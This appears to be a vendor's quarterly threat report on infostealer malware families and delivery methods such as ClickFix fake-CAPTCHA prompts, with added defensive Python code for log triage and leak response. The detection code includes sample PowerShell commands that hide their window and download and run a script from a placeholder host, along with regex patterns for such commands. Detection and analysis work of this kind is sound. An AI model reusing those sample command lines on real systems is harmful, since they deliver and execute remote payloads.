Top Infostealer Families in Q2 2026: Threat Landscape Report
The infostealer ecosystem entered Q2 2026 in a state of continued recomposition. Twelve months after Operation Lumma disrupted the leading Malware-as-a-Service infostealer of 2024 and 2025, the threat landscape has not contracted; it has diversified. New families have stepped into the gap left by LummaC2’s temporary retreat, older operations such as RedLine continue to circulate as forks and clones, and the initial-access playbook has shifted decisively toward ClickFix social engineering. This report consolidates what Stealed observed across underground sources between April and June 2026, and what those observations mean for security operations teams managing identity and credential risk.
Methodology
Stealed maintains a continuous monitoring pipeline across the channels where infostealer operators publicly distribute, advertise and sell stolen logs. Our coverage spans private Telegram channels (the dominant distribution surface for free and paid stealer logs since 2022), Russian-speaking underground forums, English-language criminal marketplaces, and a set of infostealer command-and-control pipelines that publish samples to closed communities before the data reaches resale channels. The data set behind this report covers the period from April 1 to June 30, 2026.
We deliberately distinguish between two activity signals. The first is distribution volume, meaning how many fresh logs from a given family appear in monitored channels per week. The second is operator interest, meaning how often a family is mentioned, recommended or advertised by affiliates and resellers in those same channels. Distribution volume is a lagging indicator, operator interest is a leading one, and the gap between the two is often where market share shifts hide.
We acknowledge two important limitations. First, our visibility is biased toward Russian-speaking and English-language ecosystems, and underrepresents Chinese and Persian-language criminal forums where infostealer trade also takes place. Second, percentages and rankings reflect what reaches our collection points, not the totality of infections worldwide. For absolute figures, we defer to public sources cited throughout this report.
Q2 2026 Overview
The macro picture in Q2 2026 is best described as fragmentation under pressure. The European Union Agency for Cybersecurity reports in its Threat Landscape 2025 that 4,875 cybersecurity incidents were recorded between July 2024 and June 2025, with credential theft underpinning a substantial share of the initial-access incidents. Verizon’s Data Breach Investigations Report 2025 confirms that stolen credentials remain implicated in 88 percent of web application breaches, a structural figure that has barely moved across three consecutive editions of the report.
Against that backdrop, three trends define Q2 2026. The first is the post-Operation Lumma redistribution of MaaS market share, with Stealc V2 emerging as the most credible technical successor while Vidar stabilizes as the conservative choice for affiliates seeking reliability over novelty. The second is the consolidation of ClickFix as the dominant initial-access technique, eclipsing classic phishing attachments in volume terms across multiple campaigns documented by Microsoft, Proofpoint and others. The third is the continued professionalization of the resale layer, where stolen logs are increasingly sold through tiered subscription services rather than one-shot Telegram drops.
LummaC2: Post-Takedown Landscape
LummaC2 entered 2025 as the dominant commercial infostealer, sold as a service under Russian-speaking branding with affiliate plans starting around 250 USD per month. On May 21, 2025, Microsoft’s Digital Crimes Unit, the United States Department of Justice, Europol and Japan’s Cybercrime Control Center announced a coordinated disruption of the Lumma Stealer infrastructure, seizing or sinkholing more than 2,300 command-and-control domains and severing the operator’s ability to provide reliable service to its affiliates.
The immediate effect was significant. Industry telemetry from multiple vendors observed roughly a 70 percent drop in LummaC2 sample volume during the four to six weeks following the takedown. However, by late summer 2025, variants and partial rebrands had resumed distribution. The MaaS code base was leaked or shared in selected forums, and several smaller operations rebuilt on top of it with new infrastructure. By Q2 2026, LummaC2-derived samples have not returned to their pre-takedown peak, but they continue to represent a meaningful share of the logs we observe, and the family remains in the top three most-distributed strains alongside Vidar and Stealc V2.
The lesson from Lumma confirms a pattern observed since the Emotet disruption of 2021. Takedowns of MaaS infrastructure produce real, measurable, valuable disruption, but they do not eliminate the underlying market. Operator brand equity and code lineage outlive infrastructure, and the affiliate ecosystem migrates within weeks. Defenders should treat such takedowns as windows of reduced pressure, not as resolutions.
RedLine: Variants and Decline
RedLine Stealer dominated the infostealer landscape between 2021 and 2024 and was the most-named family in stolen credential markets for most of that period. The October 2024 Operation Magnus, led by the Dutch National Police in coordination with the FBI and Eurojust, seized RedLine and Meta Stealer infrastructure and identified suspects associated with the operation. The disruption was decisive for the original RedLine commercial service.
What we observe in Q2 2026 is the long tail. RedLine source code variants and clones continue to circulate in underground markets, redistributed by smaller operators who repackage the original payload with new C2 infrastructure and minor obfuscation changes. The family’s share of fresh logs has declined steadily since late 2024 and now sits well below LummaC2 derivatives, Stealc V2 and Vidar in our monitoring. RedLine is no longer a leading commercial product, but it remains a relevant threat because of how widely its code base has been forked. Defenders should expect to keep encountering RedLine artefacts for several more years, even as operator interest moves elsewhere.
Vidar: Maturity and Stability
Vidar represents the conservative end of the infostealer market. The family has been active since at least 2018, and its operators have followed a strategy of incremental refinement rather than disruptive rewrites. The result is a mature code base with stable command-and-control patterns, well-understood evasion techniques, and reliable exfiltration pipelines.
In Q2 2026, Vidar benefits from its stability. Affiliates frustrated by the post-Lumma uncertainty have increasingly favored Vidar for campaigns where reliability matters more than feature parity with newer entrants. The family does not innovate aggressively, and that is precisely its commercial appeal. Vidar logs are predictable, support straightforward parsing, and integrate cleanly into existing resale pipelines. We expect Vidar to retain its current share through the rest of 2026 unless a disruptive law-enforcement action targets the operator directly.
Stealc V2: Emergence
Stealc first appeared in early 2023 as a relatively conventional infostealer marketed in Russian-speaking forums. The release of Stealc V2 in 2025 changed the trajectory. The rewrite introduced a modular architecture, support for plug-in modules, improved configuration via JSON-based panels and meaningful evasion improvements against common endpoint detection logic. Crucially, Stealc V2 was positioned during the post-Lumma vacuum, and a significant share of former LummaC2 affiliates migrated to Stealc V2 during the second half of 2025.
By Q2 2026, Stealc V2 is the most credible technical successor to LummaC2 in the MaaS market. Operator interest, measured by mentions and recommendations in monitored channels, ranks Stealc V2 above all other newcomers. Distribution volume confirms the trend, with Stealc V2 logs now representing one of the largest shares of fresh content in our pipeline. The family is the one to watch for the rest of 2026, and a future law-enforcement action against Stealc V2 infrastructure would mark the next inflection point in the ecosystem.
Acreed and Other Emerging Families
Beyond the top tier, several smaller families warrant mention. Acreed is a 2024-vintage stealer that gained traction in early 2026 thanks to aggressive pricing and an active reseller program, although its share remains marginal compared with the top three. MetaStealer continues to circulate, primarily through forks of leaked code, and shows up in opportunistic campaigns rather than sustained operator-led distribution. On the macOS side, Atomic Stealer (also tracked as AMOS) holds the dominant position for Apple-targeted infostealing, with regular updates and a steady presence in malvertising campaigns aimed at developers, designers and crypto users. macOS infostealer activity grew meaningfully through 2025, and Q2 2026 confirms that the platform is no longer an afterthought for credential theft.
Dominant Infection Vectors in Q2 2026
The most consequential shift of the past twelve months is not which malware family ranks first; it is how that malware reaches victims. ClickFix has established itself as the dominant initial-access technique. The pattern is consistent across campaigns. A user lands on a compromised or attacker-controlled page, encounters a fake CAPTCHA or “verify you are human” prompt, and is instructed to copy a string into the Windows Run dialog or terminal to “complete verification.” The pasted string is in fact a PowerShell command that downloads and executes the infostealer payload. Microsoft has documented multiple ClickFix variants targeting both consumer and enterprise users.
ClickFix is effective for two reasons. First, it bypasses many endpoint controls because the user is the one executing the command, on their own machine, in a context that does not look like a classic email-borne attachment. Second, it exploits user familiarity with CAPTCHA fatigue, where security prompts have become so common that an additional verification step does not raise suspicion.
Alongside ClickFix, three secondary vectors remain highly active. Google Ads malvertising continues to drive significant volume, with attackers buying sponsored slots for popular software keywords (Notion, Slack, Zoom, OBS, AnyDesk, common AI tools) and serving trojanized installers from look-alike domains. Trojanized GitHub releases, often advertised through fake AI tooling repositories or game cheat projects, have become a meaningful distribution channel for both Windows and macOS payloads. Finally, YouTube cracks (videos describing how to obtain pirated software, with descriptions linking to password-protected archives containing infostealers) remain a steady volume contributor, particularly for younger demographics.
Implications for Security Teams
The defensive posture that addresses Q2 2026 infostealer reality has three layers. The first is endpoint resilience. EDR with strong behavioral heuristics, application control where feasible, and tight constraints on PowerShell, mshta and rundll32 execution materially raise the cost of ClickFix-style payloads. PowerShell logging (script block logging, module logging, transcription) should be enabled and forwarded to the SIEM, because retroactive investigation of ClickFix infections depends on it.
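The retroactive investigation this paragraph depends on starts with the script block logs themselves. The following is an added example, not code from the report or from Stealed: a small triage routine that scores PowerShell script block records for the traits the ClickFix description above lists (a hidden window, an encoded command, a download cradle, inline execution, and a launch from the user's shell rather than a script host). The record shape (a `script` field and a `parent` process image) is an assumed simplification of Event ID 4104 joined with process-creation data, and the sample events are constructed; the URL in them is a non-routable placeholder.

```python
import base64
import re

# Indicator patterns, applied case-insensitively to the (decoded) script text.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# -e / -ec / -enc / -encodedcommand followed by a base64 blob (UTF-16LE script).
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(?:invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|net\.webclient)", re.I)
INLINE_EXEC = re.compile(r"(?:invoke-expression|\biex\b)", re.I)

# Flag at or above this many matched indicators; tune against your own baseline.
ALERT_THRESHOLD = 3


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is malformed."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def score_script_block(event):
    """Score one script block record; returns (score, list of matched indicator names)."""
    text = event["script"]
    reasons = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command")
        text = text + "\n" + decoded          # scan the decoded script as well
    if HIDDEN_WINDOW.search(text):
        reasons.append("hidden window")
    if DOWNLOAD_CRADLE.search(text):
        reasons.append("download cradle")
    if INLINE_EXEC.search(text):
        reasons.append("inline execution")
    # A paste into the Run dialog or a console opened by the user is launched by explorer.exe,
    # unlike scheduled tasks, services or management agents.
    if event.get("parent", "").lower().endswith("explorer.exe"):
        reasons.append("launched from explorer.exe")
    return len(reasons), reasons


def flag_clickfix_candidates(events, threshold=ALERT_THRESHOLD):
    """Return the records that reach the threshold, each paired with its reasons."""
    flagged = []
    for event in events:
        score, reasons = score_script_block(event)
        if score >= threshold:
            flagged.append((event, score, reasons))
    return flagged


# Constructed sample records (not real telemetry). The encoded blob is built here so the
# reader can see exactly what it contains.
ENCODED_PAYLOAD = base64.b64encode(
    "iex (iwr 'http://example.invalid/verify')".encode("utf-16-le")).decode("ascii")
BENIGN_EVENT = {"script": "Get-Service -Name Spooler | Select-Object Status",
                "parent": r"C:\Windows\System32\svchost.exe"}
ENCODED_EVENT = {"script": f"powershell -w hidden -enc {ENCODED_PAYLOAD}",
                 "parent": r"C:\Windows\explorer.exe"}
PLAIN_EVENT = {"script": 'powershell -w hidden -c "iwr http://example.invalid/x | iex"',
               "parent": r"C:\Windows\explorer.exe"}
SAMPLE_EVENTS = [BENIGN_EVENT, ENCODED_EVENT, PLAIN_EVENT]

if __name__ == "__main__":
    for event, score, reasons in flag_clickfix_candidates(SAMPLE_EVENTS):
        print(score, reasons, event["script"][:60])
```

The decoded command is appended to the raw text before scoring so that indicators hidden behind `-EncodedCommand` count the same as plain ones; without script block logging enabled and forwarded, neither the raw nor the decoded text would be available for this kind of after-the-fact review.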
The second layer is identity. Infostealers exfiltrate browser-stored credentials and authenticated session cookies, and the cookies are often the more valuable asset because they bypass MFA challenges entirely. The mitigation is twofold: shorten session lifetimes to reduce the window during which a stolen cookie remains useful, and deploy AiTM-resistant MFA wherever possible, with FIDO2 security keys or device-bound passkeys for privileged accounts as the default. Conditional access policies that bind sessions to device posture or network location add a further constraint.
The third layer, and the one that endpoint and identity controls cannot replace, is external monitoring. Once credentials are exfiltrated, they enter resale channels within hours and are typically advertised within a day or two. The post-publication window, between the moment logs appear in Telegram channels or underground markets and the moment they are operationalized by a buyer, is where defenders can still act, but only if they have visibility into those channels. Integrating external dark web and Telegram monitoring alerts directly into the SIEM or SOAR pipeline allows the SOC to trigger automated password resets, session revocations and conditional access policy changes for affected accounts, often before the credentials are used.
CISOs should pair this technical posture with a strategic conversation about acceptable exposure. Infostealers are opportunistic by design and will infect employees, contractors and even personal devices with corporate credentials saved in browsers. The objective is not zero exposure; it is short time-to-detection and short time-to-revocation.
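The identity and monitoring layers above come together in the playbook that runs when a leak alert reaches the SOAR. The following is an added example and not code from the report or from Stealed: it takes constructed leak alerts (email, login domain, source channel, publication time, whether a session cookie was in the log), drops alerts for domains the organization does not own and duplicate reports of the same credential, and decides per account whether to reset the password, revoke sessions and tighten conditional access. The session-lifetime logic shows the lever described under the identity layer: a cookie published longer ago than the configured session lifetime has necessarily expired, so the shorter the lifetime, the fewer revocations are needed and the smaller the post-publication window. Domain names, channel names and timestamps are all constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class LeakAlert:
    email: str               # credential owner as reported by the monitoring feed
    domain: str              # domain of the login URL found in the stealer log
    source: str              # constructed channel / market name
    published_at: datetime   # when the log first appeared in a resale channel
    has_session_cookie: bool


@dataclass
class Decision:
    actions: list            # ordered playbook steps for the SOAR
    exposure: timedelta      # time between publication and this decision


# Domains the organization owns; alerts for anything else are not ours to act on.
WATCHED_DOMAINS = {"corp.example", "sso.corp.example"}


def plan_response(alert, now, session_lifetime):
    """Decide the response for one alert that has already passed the domain and dedupe filters."""
    actions = ["reset_password"]
    if alert.has_session_cookie:
        # The session was issued before the log was published, so publication time is a
        # lower bound on the cookie's age. Older than the lifetime means it has expired;
        # otherwise assume it is still live and revoke.
        if now - alert.published_at < session_lifetime:
            actions.append("revoke_sessions")
        else:
            actions.append("cookie_expired_by_policy")
    # Bind the account to device posture / location until the owner re-enrols.
    actions.append("tighten_conditional_access")
    return Decision(actions=actions, exposure=now - alert.published_at)


def run_playbook(alerts, now, session_lifetime):
    """Process a batch of alerts oldest first; returns {(email, domain): Decision}."""
    seen = set()
    decisions = {}
    for alert in sorted(alerts, key=lambda a: a.published_at):
        key = (alert.email, alert.domain)
        if alert.domain not in WATCHED_DOMAINS or key in seen:
            continue                     # foreign domain, or a resale of a log already handled
        seen.add(key)
        decisions[key] = plan_response(alert, now, session_lifetime)
    return decisions


# Constructed alerts (not real data) relative to a fixed "now".
NOW = datetime(2026, 6, 15, 12, 0, tzinfo=timezone.utc)
ALERT_ALICE = LeakAlert("alice@corp.example", "sso.corp.example", "tg:cloud-logs-1",
                        NOW - timedelta(minutes=30), True)
ALERT_ALICE_RESOLD = LeakAlert("alice@corp.example", "sso.corp.example", "market:ulp-2",
                               NOW - timedelta(minutes=5), True)
ALERT_BOB = LeakAlert("bob@corp.example", "corp.example", "tg:cloud-logs-1",
                      NOW - timedelta(days=3), True)
ALERT_OTHER = LeakAlert("carol@corp.example", "other.example", "tg:cloud-logs-1",
                        NOW - timedelta(hours=1), False)
SAMPLE_ALERTS = [ALERT_ALICE, ALERT_ALICE_RESOLD, ALERT_BOB, ALERT_OTHER]

if __name__ == "__main__":
    for key, decision in run_playbook(SAMPLE_ALERTS, NOW, timedelta(hours=24)).items():
        print(key, decision.exposure, decision.actions)
```

Running the same batch with a seven-day session lifetime instead of 24 hours turns Bob's three-day-old cookie back into a live one that must be revoked, which is the concrete cost of long sessions that the identity layer above is meant to avoid.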
Methodology and Limitations
We deliberately avoid publishing precise market share percentages attributed to Stealed, because such figures are sensitive to collection bias and cannot be independently verified by the reader. The qualitative rankings in this report (top three families, leading initial-access vector, declining versus rising operators) reflect convergent signals across distribution volume, operator interest and reseller positioning. Where precise figures are useful, we cite public sources: ENISA, Verizon, Microsoft, IBM X-Force, and the MITRE ATT&CK entry for LummaC2 (S1213). The IBM X-Force Threat Intelligence Index 2025 provides additional context on credential abuse trends consistent with the picture described here.
This report is a snapshot. The infostealer ecosystem moves quickly, and the rankings that hold in Q2 2026 may shift meaningfully by Q4. We publish updates quarterly precisely to track that movement.
Frequently Asked Questions
Which infostealer family was most active in Q2 2026? Despite the May 2025 Microsoft and DOJ takedown (Operation Lumma) that disrupted 2,300+ command-and-control domains, LummaC2 variants regained activity in late 2025 and remain among the top three most-distributed families in Q2 2026, alongside Vidar and Stealc V2.
What is the dominant infection vector in 2026? ClickFix fake CAPTCHA prompts, malvertising via Google Ads, trojanized GitHub releases and YouTube cracks dominate. ClickFix specifically tricks users into pasting malicious PowerShell into their own terminal, bypassing many endpoint controls.
Did Operation Lumma actually reduce LummaC2 activity? Temporarily yes (estimated 70 percent volume drop in the weeks following May 2025), but variants resumed distribution within months under partial rebranding. Takedowns slow but do not eliminate MaaS infostealer ecosystems.
What sectors are most targeted? Financial services, SaaS providers, e-commerce, gaming and crypto wallets dominate the victimology, mirroring the credential value of accounts in those sectors. Infostealers are opportunistic by design and infect any victim regardless of sector.
How can security teams respond? Layer EDR with strong heuristics, AiTM-resistant MFA (FIDO2 where possible), short session lifetimes, and external dark web monitoring covering Telegram channels and underground forums. Endpoint controls alone miss the post-publication window where credentials are already on sale.
Further Reading
- What is an infostealer?
- Infostealer glossary
- Infostealer threat report, March 2026
- How to detect credential leaks
About Stealed
Stealed monitors more than 100 million credentials per day across private Telegram channels, underground forums and dark web marketplaces, and surfaces leaks affecting your domains, employees and customers within minutes of publication. If your organization wants to understand its current exposure or close the post-publication window described in this report, discuss your exposure with our CTO or receive the next quarterly threat report directly in your inbox.

Co-founder & CEO
CEO and co-founder of Stealed, Jason brings business vision and offensive security expertise to drive the threat detection strategy.